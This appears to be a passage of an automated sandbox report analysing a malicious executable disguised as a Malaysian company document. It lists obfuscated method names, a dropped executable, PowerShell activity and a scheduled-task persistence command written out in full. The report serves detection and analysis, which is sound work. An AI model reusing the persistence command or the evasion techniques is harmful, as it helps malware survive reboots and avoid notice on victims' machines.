Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, a6Rf7FhOnIQQp4Keik.cs High entropy of concatenated method names: 'Dispose', 'I1PMG2xkVV', 'IuVYbNwK7t', 'Lht8835Io1', 'WR4MgnZ2H5', 'TDTMzLOs2m', 'ProcessDialogKey', 'n6NYKJvkQ5', 'dEhYMgAtVW', 'PoSYYEGiQh'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, xhRr5d38UPcJ29ohL9.cs High entropy of concatenated method names: 'MwxpH2ii7p', 'u33p1mU9NQ', 'XicpQ4ZAWi', 'y1NQgX81EX', 'iRmQzNJ1hS', 'XOVpKR5dpH', 'xKopMw7ld2', 'WdcpYhniml', 'IquptxSwR0', 'erRpf2uyr9'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, n99CWu8o4qWU03vC7R.cs High entropy of concatenated method names: 'DLD2UTZ9CT', 'fck2e0G5Lx', 'ToString', 'X132HV5up9', 'cLa2JUBgox', 'l7n21BZcD1', 'JFh2PRon5I', 'P2Y2Q4FQEh', 'O0L2pAe2jI', 'Uc72s8f5WQ'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, OH7rokb1NRcoyR55vja.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gaVrE0mBJk', 'x3irBpZvIU', 'RUDrDd0gLR', 'bVZr5LUDEp', 'lkqrN0rBv6', 'iPJrR9B78l', 'PuLrqaZFDk'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, bFojdgmUnuGXsZ2Et8.cs High entropy of concatenated method names: 'elfPcputW4', 'lWxPlon1Yc', 'rLJ1hg5Ofh', 'vKh1oiFNKi', 'vCs13gEpRU', 'Q351Svy54f', 'eIb1nFGGK9', 'fHE1yqtuUT', 'WGm1vKnH4G', 'SfZ16RdAEF'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, fn3dhyeRmpy1aqIbhC.cs High entropy of concatenated method names: 'dsq9MA7poc', 'CLi9tkAdux', 'wgW9f0Wiyp', 'gdk9HLGZsH', 'TCX9JXl0Vv', 'oqg9PfoWBV', 'Vxe9QbXUF9', 'Yl7kqj7IAw', 'DtIkXZW8El', 'gwLkGQnX5y'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, qoqZYWktJStci6f29S.cs High entropy of concatenated method names: 'V76t7gMw0d', 'FXPtHUxbmi', 'NFGtJqfcnZ', 'dFEt1WcFxY', 'mwgtPNMsSv', 'YINtQ3Do7A', 'KRRtpdXbNl', 'J6ltsWWPId', 'w4EtueCj9s', 'Pv9tUInC4d'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, UHgAuR0KWEiSURYQpg.cs High entropy of concatenated method names: 'ToString', 'Xn8Cwkyen4', 'lVUCbRu7jv', 'tyjChoeN09', 'UpHCohJaxp', 'cSXC3oQd9L', 'sYACSFHVi3', 'D5cCnlbkXm', 'DpNCy4Uj0X', 'l7BCvxo5XQ'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, HecPmJ6gFWvqumjiqv.cs High entropy of concatenated method names: 'D3uJEMNjoA', 'CcRJBr8j7f', 'w7ZJDqbEil', 'Kb4J5VccR0', 'd86JN4NVnq', 'yFXJR32HNl', 'qPoJq2OdFq', 'F6xJXSvrlm', 'dKqJG47Bjd', 'I7oJgXgVvn'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, SMh6MIRIc6OakG07pp.cs High entropy of concatenated method names: 'OmjkHs9vCX', 'F7ukJ1FjNW', 'RbRk1X7CL4', 'RoLkPpEJ0Y', 'lpckQADnKf', 'O9gkp4NJN5', 'JYaks2i9YL', 'dlHkuCtgfP', 'VoTkUmyXm7', 'T2BkeuVICG'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, uoVP2uCg0bdWUyFWjv.cs High entropy of concatenated method names: 'uYW1dLwxiV', 'vyY1WWhoOC', 'chU10QmOqd', 'Ess1Z8lZoS', 'iRR1L6qK1P', 'Cb61C0WviQ', 'uCR12ILHVs', 'HJR1kgUixu', 'yx419Q7yq0', 'oP21r4iRaE'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, sTZIxnbilXR1LmWj3Sl.cs High entropy of concatenated method names: 'm8u9aSqCN2', 'UR49OxHU1x', 'Nlk9V1JFZI', 'tH09dbXSAh', 'D9c9c0YPi8', 'ai09WVJrWG', 'EkR9lpPKlE', 'oJC90f34Qh', 'RKg9Zwib4d', 'm8g9xOnYZA'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, jy01KOzR750y1LXxEC.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Rwq9TOOtRZ', 'I5u9LImMm8', 'XEt9CPTKuL', 'wBG92qSwSi', 'iLE9k4ZdH3', 'jw099TlRgJ', 'Mpb9rFKkq0'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, t1DfyrSZWB1uISyNpZ.cs High entropy of concatenated method names: 'K9KQ7TFMnh', 'E0IQJbmwkI', 'HiEQP81RaQ', 'aMnQpxiwnm', 'r5QQs1NnXd', 'j0lPNo1WDU', 'Mb2PRvhoO2', 'Np1PqkDSZE', 'deNPXOiUQH', 'XidPGLYKSW'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, QNWvhQjrZINN7KPu3U.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'p3JYG8gFty', 'GSuYgZiR1n', 'GxUYzZna0i', 'jaYtKp9Nkw', 'n3rtM42g7l', 'OJVtY8XMNN', 'xsPtttALNb', 'E1s42BjIUtnsAMJYRHL'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, kiqa3DwVxysX4lOlBK.cs High entropy of concatenated method names: 'xl8VBKgsT', 'lG4dl9vV1', 'D8RWfMay5', 'VAelEEp3T', 'DtbZaqC94', 'CfZxk3HTM', 'Kq4VpAV4K2b2FpedVo', 'aLqKjK9J0dhueLmyJc', 'fPPkBqLY8', 'vU3rl5W7x'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, G1b9Yx2TcPUdaY9281.cs High entropy of concatenated method names: 'uWiMpHEYse', 'IbEMsFwYUM', 'wQRMUILgWl', 'bWUMecCkd4', 'RpCMLFxjHm', 'mx8MCpwa6Y', 'MnhbSl6gyXKBTqRjxf', 'Ph7hI45WRD5FMMD70y', 'rWhMM88Iyt', 'vOvMtmCp0V'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, GgAgrKJsDwJ5JIVu6G.cs High entropy of concatenated method names: 'CYdT0xQiSd', 'KQtTZ3BKEN', 'YmFT42MUS2', 'gypTbLQjw9', 'Mf7ToswUDs', 'XVTT3c4Xeb', 'HdiTn8u5IL', 'o7RTydAhKI', 'dR9T6R6wEh', 'op1Twjnngd'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, rrIrYEfBhY39sDlwNH.cs High entropy of concatenated method names: 'dWi2XKVHcf', 'fA52gvkjr1', 'pvekKY05mS', 'tZSkMcqCTm', 'bcJ2whR0UC', 'J2L2jJE5Wk', 'tau2AEFhsf', 'W2y2E4pyN1', 'oQD2B20cvM', 'cEm2DN2fmQ'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, OpG0a7BjWJqeIRfEJr.cs High entropy of concatenated method names: 'MQUpaEePsA', 'SDhpOONDfA', 'tvhpV8nsqh', 'KP2pdxnAU3', 'XUwpcrH6Uu', 'bhJpWDdZLR', 'PDOplhYHlf', 'ow7p0hlVe7', 'mtmpZGmCau', 'DXipxn90sw'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, a6Rf7FhOnIQQp4Keik.cs High entropy of concatenated method names: 'Dispose', 'I1PMG2xkVV', 'IuVYbNwK7t', 'Lht8835Io1', 'WR4MgnZ2H5', 'TDTMzLOs2m', 'ProcessDialogKey', 'n6NYKJvkQ5', 'dEhYMgAtVW', 'PoSYYEGiQh'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, xhRr5d38UPcJ29ohL9.cs High entropy of concatenated method names: 'MwxpH2ii7p', 'u33p1mU9NQ', 'XicpQ4ZAWi', 'y1NQgX81EX', 'iRmQzNJ1hS', 'XOVpKR5dpH', 'xKopMw7ld2', 'WdcpYhniml', 'IquptxSwR0', 'erRpf2uyr9'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, n99CWu8o4qWU03vC7R.cs High entropy of concatenated method names: 'DLD2UTZ9CT', 'fck2e0G5Lx', 'ToString', 'X132HV5up9', 'cLa2JUBgox', 'l7n21BZcD1', 'JFh2PRon5I', 'P2Y2Q4FQEh', 'O0L2pAe2jI', 'Uc72s8f5WQ'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, OH7rokb1NRcoyR55vja.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gaVrE0mBJk', 'x3irBpZvIU', 'RUDrDd0gLR', 'bVZr5LUDEp', 'lkqrN0rBv6', 'iPJrR9B78l', 'PuLrqaZFDk'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, bFojdgmUnuGXsZ2Et8.cs High entropy of concatenated method names: 'elfPcputW4', 'lWxPlon1Yc', 'rLJ1hg5Ofh', 'vKh1oiFNKi', 'vCs13gEpRU', 'Q351Svy54f', 'eIb1nFGGK9', 'fHE1yqtuUT', 'WGm1vKnH4G', 'SfZ16RdAEF'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, fn3dhyeRmpy1aqIbhC.cs High entropy of concatenated method names: 'dsq9MA7poc', 'CLi9tkAdux', 'wgW9f0Wiyp', 'gdk9HLGZsH', 'TCX9JXl0Vv', 'oqg9PfoWBV', 'Vxe9QbXUF9', 'Yl7kqj7IAw', 'DtIkXZW8El', 'gwLkGQnX5y'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, qoqZYWktJStci6f29S.cs High entropy of concatenated method names: 'V76t7gMw0d', 'FXPtHUxbmi', 'NFGtJqfcnZ', 'dFEt1WcFxY', 'mwgtPNMsSv', 'YINtQ3Do7A', 'KRRtpdXbNl', 'J6ltsWWPId', 'w4EtueCj9s', 'Pv9tUInC4d'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, UHgAuR0KWEiSURYQpg.cs High entropy of concatenated method names: 'ToString', 'Xn8Cwkyen4', 'lVUCbRu7jv', 'tyjChoeN09', 'UpHCohJaxp', 'cSXC3oQd9L', 'sYACSFHVi3', 'D5cCnlbkXm', 'DpNCy4Uj0X', 'l7BCvxo5XQ'
Drops PE files
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe File created: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp"

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
